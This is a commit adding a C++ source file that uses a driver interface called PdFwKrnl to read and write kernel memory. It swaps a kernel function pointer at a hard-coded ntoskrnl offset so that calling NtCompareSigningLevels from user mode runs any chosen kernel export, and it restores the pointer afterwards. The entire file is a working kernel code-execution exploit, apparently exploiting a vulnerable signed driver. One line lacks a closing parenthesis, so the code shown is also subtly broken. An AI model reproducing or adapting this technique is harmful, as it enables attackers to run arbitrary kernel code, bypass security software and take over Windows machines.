Add files via upload

source/entry.cpp

@@ -0,0 +1,49 @@
+#include "PdFwKrnl.h"
+
+template <typename T, typename... Args>
+T call_kernel_function(const char* function_name, Args... args){
+
+	uint64_t ntoskrnl_base = pdfwkrnl.get_ntoskrnl_base();
+	if (!ntoskrnl_base)
+		return T{};
+
+	uint64_t function_address = pdfwkrnl.get_ntoskrnl_export(function_name);
+	if (!function_address)
+		return T{};
+
+	uint64_t qword_swap = ntoskrnl_base + 0xC1DA00;
+	uint64_t qword_original = 0;
+
+	if (!pdfwkrnl.read_virtual_memory(qword_swap, &qword_original, sizeof(uint64_t)))
+		return T{};
+
+	if (!pdfwkrnl.write_virtual_memory(qword_swap, &function_address, sizeof(uint64_t)))
+		return T{};
+	
+	HMODULE m_ntdll = GetModuleHandleA("ntdll.dll");
+	if (!m_ntdll)
+		return T{};
+
+	FARPROC NtCompareSigningLevels = GetProcAddress(m_ntdll, "NtCompareSigningLevels");
+
+	using FuncPtr = T(__stdcall*)(Args...);
+	FuncPtr func = reinterpret_cast<FuncPtr>(NtCompareSigningLevels);
+
+	T return_value = func(args...);
+
+	pdfwkrnl.write_virtual_memory(qword_swap, &qword_original, sizeof(uint64_t); // swap back
+
+	return return_value;
+}
+
+int main() {
+	if (!pdfwkrnl.attach())
+		return -1;
+
+	printf("attached to kernel\n");
+
+	call_kernel_function<void>("DbgPrint", "called kernel function");
+
+	pdfwkrnl.detach();
+	return 0;
+}